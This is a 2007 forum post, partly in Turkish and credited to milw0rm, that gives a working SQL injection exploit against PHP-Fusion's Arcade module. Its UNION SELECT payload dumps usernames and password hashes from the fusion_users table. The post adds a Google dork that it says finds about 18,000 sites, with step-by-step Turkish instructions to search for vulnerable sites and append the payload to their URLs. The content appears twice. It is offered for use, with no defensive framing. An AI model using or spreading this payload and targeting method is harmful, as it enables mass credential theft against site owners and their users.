soldiers_of_God
04-24-2007, 11:53 AM
PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln
--------------------------------
Exploit:
index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*
--------------------------------
Exapmle: Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
--------------------------------
Google Dork:
/infusions/arcade/ 18.000 sites:)
--------------------------------
kısaca googlede /infusions/arcade/ şeklinde aratıyoruz (arama yollarını genişletebiliriz)
url adresinde arama yaptığımız klasör olan sitelerin ucuna index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/* kodumuzu ekliyoruz ;)
ALINTIDIR ; milw0rm.com
--------------------------------
Exploit:
index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*
--------------------------------
Exapmle: Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
--------------------------------
Google Dork:
/infusions/arcade/ 18.000 sites:)
--------------------------------
kısaca googlede /infusions/arcade/ şeklinde aratıyoruz (arama yollarını genişletebiliriz)
url adresinde arama yaptığımız klasör olan sitelerin ucuna index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/* kodumuzu ekliyoruz ;)
ALINTIDIR ; milw0rm.com